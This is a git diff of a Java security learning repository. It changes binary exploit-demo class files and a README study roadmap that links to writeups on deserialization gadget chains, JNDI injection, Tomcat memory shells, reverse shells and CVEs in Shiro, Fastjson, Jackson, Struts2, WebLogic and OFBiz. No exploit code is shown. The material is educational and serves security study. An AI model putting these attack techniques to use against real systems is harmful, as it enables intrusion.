diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/JarRce.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/JarRce.class"
index 8d761653..381372af 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/JarRce.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/DynamicClassLoader/URLClassLoader/JarRce.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileCopy.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileCopy.class"
index 3dc74c82..259fb9a9 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileCopy.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileCopy.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead01.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead01.class"
index 1df0b9e4..86f6a12a 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead01.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead01.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead02.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead02.class"
index 3480af9e..81d1d985 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead02.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileInputRead02.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite01.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite01.class"
index 0d37fe9a..ff906d68 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite01.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite01.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite02.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite02.class"
index 6db02334..2b91cadb 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite02.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileOutputWrite02.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileReaderPrint.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileReaderPrint.class"
index f27725a4..5af1259c 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileReaderPrint.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileReaderPrint.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileWriteUse.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileWriteUse.class"
index 61d1cfb9..69c821fe 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileWriteUse.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/IOStream/FileWriteUse.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/ReflectDemo/SeralizeDemo/URLDNSEXP.class" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/ReflectDemo/SeralizeDemo/URLDNSEXP.class"
index 8d31713d..6a272952 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/ReflectDemo/SeralizeDemo/URLDNSEXP.class" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/out/production/Reappearance/src/ReflectDemo/SeralizeDemo/URLDNSEXP.class" differ
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/ser.bin" "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/ser.bin"
index 499161be..e14fd9fe 100644
Binary files "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/ser.bin" and "b/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/ser.bin" differ
diff --git a/README.md b/README.md
index 00b898ed..cf91ebbc 100644
--- a/README.md
+++ b/README.md
@@ -1,12 +1,8 @@
-> 如果师傅们看到有好的文章,也欢迎 pr,一起分享在这个 repo 中
->
-> 详细项目代码在 JavaSecurity 文件夹中
-
 # JavaSecurityLearning
 
-## Ref:
+项目的初衷是为了让更多师傅在学习 Java 安全的时候能够有一条比较清晰的学习路线,也希望师傅们通过这个项目学习 Java 安全时有能够所收获。
 
- https://github.com/Y4tacker/JavaSec
+项目文件夹中包含了部分用于漏洞调试的代码(如果有些东西自己搭建失败,可以复用仓库代码),对应文章记录在博客中。
 
 ## 基础开发(是一定要学的)
 
@@ -16,13 +12,13 @@
 
 学完这两个之后可以自己过一个小项目[【实战】基于SpringBoot+Vue开发的前后端分离博客项目完整教学](https://www.bilibili.com/video/BV1PQ4y1P7hZ?vd_source=a4eba559e280bf2f1aec770f740d0645)
 
-- 学完这些内容最多花费两个月时间。
+- 学完这些内容最多花费两个月
 
 推荐的 Java 基础,哪块不懂看哪块,[二倍速【狂神说Java】Java零基础学习视频通俗易懂](https://www.bilibili.com/video/BV12J41137hu?spm_id_from=333.337.search-card.all.click)
 
 ## Java 安全基础
 
-可以看b站白日梦组长的视频,讲的非常好
+可以看b站白日梦组长视频,讲的非常好。
 
 - [Java反序列化漏洞专题-基础篇(21/09/05更新类加载部分)](https://www.bilibili.com/video/BV16h411z7o9?spm_id_from=333.788.top_right_bar_window_custom_collection.content.click)
 - [Java-IO流](https://drun1baby.github.io/2022/05/30/Java-IO流/)
@@ -34,7 +30,7 @@
 - [反弹shell学习 ———— 这里主要是为了 yso 的使用](https://drun1baby.github.io/2022/07/20/反弹shell学习/)
 - [Java 反弹 shell 与 Runtime.getRuntime().exec() 的故事](https://drun1baby.github.io/2022/10/12/Java-反弹-shell-与-Runtime-getRuntime-exec-的故事/)
 
-一开始学还是会有点懵的,学到后面自然而然就会了
+一开始学还是会有点懵的,学到后面自然而然就会了。
 
 ## Java 反序列化基础
 
@@ -69,6 +65,8 @@ CC 链部分结束,进入 shiro 部分,shiro 之前我们已经走过开发
 - [Shiro550流程分析](https://drun1baby.github.io/2022/07/10/Java反序列化Shiro篇01-Shiro550流程分析/)
 - [02-Shiro721流程分析](https://drun1baby.top/2023/03/08/Java反序列化Shiro篇02-Shiro721流程分析/)
 
+后面根据自己需求可以补 Shiro 权限绕过的部分。
+
 ## Java 反序列化进阶
 
 - 这块是基础中的基础,但是也很难,要静下心来学的。
@@ -83,7 +81,7 @@ LDAP 是包含在 JNDI 里面的
 
 学完上面的之后就可以开始学习其他的了。
 
-## Fastjson&&Jackson
+## Fastjson
 
 - [FastJson基础](https://drun1baby.github.io/2022/08/04/Java反序列化Fastjson篇01-Fastjson基础/)
 - [Fastjson-1.2.24版本漏洞分析](https://drun1baby.github.io/2022/08/06/Java反序列化Fastjson篇02-Fastjson-1-2-24版本漏洞分析/)
@@ -110,8 +108,6 @@ LDAP 是包含在 JNDI 里面的
 - [CVE-2021-2109 WebLogic JNDI 注入](https://drun1baby.top/2023/02/12/CVE-2021-2109-WebLogic-JNDI-注入/)
 - [WebLogic 弱口令&文件上传&SSRF](https://drun1baby.top/2023/03/06/WebLogic-弱口令-文件上传-SSRF/)
 
-
-
 ## EL 表达式注入(本质上还是 OGNL 表达式注入)
 
 - [Java 之 SpEL 表达式注入](https://drun1baby.github.io/2022/09/23/Java-之-SpEL-表达式注入/)
@@ -121,6 +117,7 @@ LDAP 是包含在 JNDI 里面的
 ## 内存马
 
 关于内存马的环境搭建可以看我这一篇文章:[Servlet 项目搭建](https://drun1baby.github.io/2022/08/22/Servlet-项目搭建/)
+学习完之后最好自己可以用 Java Agent 实现一个 RASP
 
 - [Java反序列化之内存马系列 01-基础内容学习](https://drun1baby.github.io/2022/08/19/Java内存马系列-01-基础内容学习/)
 - [Java内存马系列-02-内存马介绍](https://drun1baby.github.io/2022/08/21/Java内存马系列-02-内存马介绍/)
@@ -128,15 +125,22 @@ LDAP 是包含在 JNDI 里面的
 - [Java内存马系列-04-Tomcat 之 Listener 型内存马](https://drun1baby.github.io/2022/08/27/Java内存马系列-04-Tomcat-之-Listener-型内存马/)
 - [Java内存马系列-05-Tomcat 之 Servlet 型内存马](https://drun1baby.github.io/2022/09/04/Java内存马系列-05-Tomcat-之-Servlet-型内存马/)
 - [Java内存马系列-06-Tomcat 之 Valve 型内存马](https://drun1baby.github.io/2022/09/07/Java内存马系列-06-Tomcat-之-Valve-型内存马/)
+- [Java Agent 内存马学习](https://drun1baby.top/2023/12/07/Java-Agent-内存马学习/)
+
+## 关于 Java 代码审计(很多人对这块其实有个误区)
 
-## 关于 Java 代码审计
+其实 Java 安全不光只有反序列化,其实代码审计也是很重要的,我最开始学的时候就踏入了这个误区。
 
 WebGoat 代码打底 [WebGoat代码审计](https://drun1baby.top/2022/03/17/WebGoat代码审计-02-SQL注入/)
 
-详细的**代码审计的文章**与资料,指路 [Java Owasp Top10 审计](https://github.com/Drun1baby/JavaSecurityLearning/tree/main/JavaSecurity/CodeReview/JavaSec-Code)
+详细的**代码审计的文章与资料**,指路 [Java Owasp Top10 审计](https://github.com/Drun1baby/JavaSecurityLearning/tree/main/JavaSecurity/CodeReview/JavaSec-Code)
+
+Springboot 文件上传 RCE https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks
 
 ## 查漏补缺
 
+- 其实链子没必要跟太多了,实战才是最重要的。
+
 [Java反序列化之C3P0链](https://drun1baby.github.io/2022/10/06/Java反序列化之C3P0链/)
 
 [Java OWASP 中的 XXE 代码审计](https://drun1baby.github.io/2022/09/16/Java-OWASP-中的-XXE-代码审计/)
@@ -151,15 +155,89 @@ WebGoat 代码打底 [WebGoat代码审计](https://drun1baby.top/2022/03/17/WebG
 
 [Java反序列化Fastjson篇05-写给自己看的一些源码深入分析](https://drun1baby.github.io/2022/10/19/Java反序列化Fastjson篇05-写给自己看的一些源码深入分析/)
 
+JS 引擎攻防 https://xz.aliyun.com/t/8697
+
 ## Struts2 系列漏洞
 
+这块应该是目前学习的重点之一
+
 [Java Struts2 学习与环境搭建](https://drun1baby.github.io/2022/11/02/Java-Struts2-学习与环境搭建/)
 
 [Java Struts2 系列 S2-001](https://drun1baby.github.io/2022/10/27/Java-Struts2-系列-S2-001/)
 
+## Jackson 系列漏洞
+
+[Jackson 反序列化(一)漏洞原理](https://drun1baby.top/2023/12/07/Jackson-反序列化(一)漏洞原理/)
+
+[Jackson 反序列化(二)CVE-2017-7525](https://drun1baby.top/2023/12/07/Jackson-反序列化(二)CVE-2017-7525/)
+
+[Jackson 反序列化(三)CVE-2017-17485](https://drun1baby.top/2023/12/07/Jackson-反序列化(三)CVE-2017-17485/)
+
+Jackson 反序列化 —— https://boogipop.com/2023/06/20/Jackson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%80%9A%E6%9D%80Web%E9%A2%98/
+
+## Apache
+
+### Apache DolphinScheduler
+
+CVE-2023-49299 & CVE-2024-23320 & CVE-2023-49109 漏洞概述:https://xz.aliyun.com/t/13981
+
+### Apache Ofbiz
+
+https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/
+
 ## CodeQL
 
+师傅可能在编译的时候还会遇到一些问题,然而新版本的 CodeQL 对于 Java 已经不需要编译了
+
 [CodeQL 入门](https://drun1baby.top/2023/09/03/CodeQL-%E5%85%A5%E9%97%A8/)
 
 [CodeQL 官方文档学习](https://drun1baby.top/2023/07/31/CodeQL-%E5%AD%A6%E4%B9%A0/)
 
+[用CodeQL分析漏洞_CVE-2022-42889 &#124; l3yx's blog](https://l3yx.github.io/2022/12/17/用CodeQL分析漏洞-CVE-2022-42889/)
+
+## 漏洞挖掘
+
+Tabby 的使用:https://github.com/wh1t3p1g/tabby
+
+## 后记
+感觉现在 go 用的真的很多,java 系列可能暂时断更了,或许在不久的将来会出一个 golangSecurityLearning
+
+<picture>
+ <source + media="(prefers-color-scheme: dark)" + srcset=" + https://api.star-history.com/svg?repos=Drun1baby/JavaSecurityLearning&type=Timeline&theme=dark + " + />
+ <source + media="(prefers-color-scheme: light)" + srcset=" + https://api.star-history.com/svg?repos=Drun1baby/JavaSecurityLearning&type=Timeline + " + />
+ Star History Chart
+</picture>
+
+- 交流群
+
+随着点 Star 的师傅越来越多,希望给师傅们提供一个交流的平台
+同时平常有一些师傅会加我好友问问题,问的人越来越多,于是决定建个群,也可以让师傅们在群里交流。(希望以后会写 golang 的 SecurityLearning)
+
+> 可加 VX DrunkbabySec
+
+![image](https://github.com/user-attachments/assets/3541e7fb-7ce1-419b-876d-cdc2a4207ad9)
+
+
+
+
+
+
+
+
+
+
+
+